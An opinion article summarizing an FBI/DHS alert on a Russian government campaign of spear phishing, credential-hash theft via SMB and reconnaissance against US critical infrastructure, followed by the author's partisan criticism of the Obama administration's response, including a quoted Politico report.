The FBI and Homeland Security (DHS) have announced that Russia repeatedly cyber-attacked America’s energy, water, aviation and manufacturing facilities.
The alert describes “indicators of compromise and technical details on the tactics, techniques, and procedures used by Russian government cyber actors on compromised victim networks.”
DHS and FBI characterize this attack as,
“A multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS). Since at least March 2016, Russian government cyber actors targeted government entities and multiple U.S. critical infrastructure sectors.”
Russia attacked two distinct categories of victims, according to the FBI and DHS: staging and intended targets.
“The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as ‘staging targets.’ The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims.”
Moscow used a variety of cyber tactics, including spear-phishing emails (from compromised legitimate account), watering-hole domains, credential gathering, open-source and network reconnaissance, host-based exploitation, and targeting industrial control system (ICS) infrastructure.
Russia’s cyber-soldiers used email attachments to leverage Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users.
Throughout the tenure of the Obama Administration, acts of both physical and cyber aggression by America’s enemies were not responded to by the most pacifist presidency in U.S. history. There was virtually no substantive reaction by Obama to China’s incursion into the exclusive economic zone of the Philippines, or to Russia’s invasion of the Ukraine, or to the attack on the American facility in Benghazi which resulted in the death of a U.S. Ambassador. As China, Russia, and North Korea moved ahead at unprecedented levels in their armaments programs, Obama reduced spending on U.S. defenses.
The Obama Administration consistently failed to respond to Russian cyber attempts to target the U.S., both in terms of infrastructure as well as in the electoral process. In 2014, Ali Watkins, writing for Politico, reported,
“The Obama administration received multiple warnings from national security officials between 2014 and 2016 that the Kremlin was ramping up its intelligence operations and building disinformation networks it could use to disrupt the U.S. political system, according to more than half a dozen current and former officials. […] Politico spoke with more than a dozen current and former officials from across the national security spectrum, including intelligence agencies, the State Department and the Pentagon. Almost all said they were aware of Russia’s aggressive cyberespionage and disinformation campaigns […] but felt that either the White House or key agencies were unwilling to act forcefully to counter the Russian actions. Intelligence officials ‘had a list of things they could never get the signoffs on,’ one intelligence official said. ‘The truth is, nobody wanted to piss off the Russians.’”
Frank Vernuccio serves as the editor-in-chief of the New York Analysis of Policy and Government.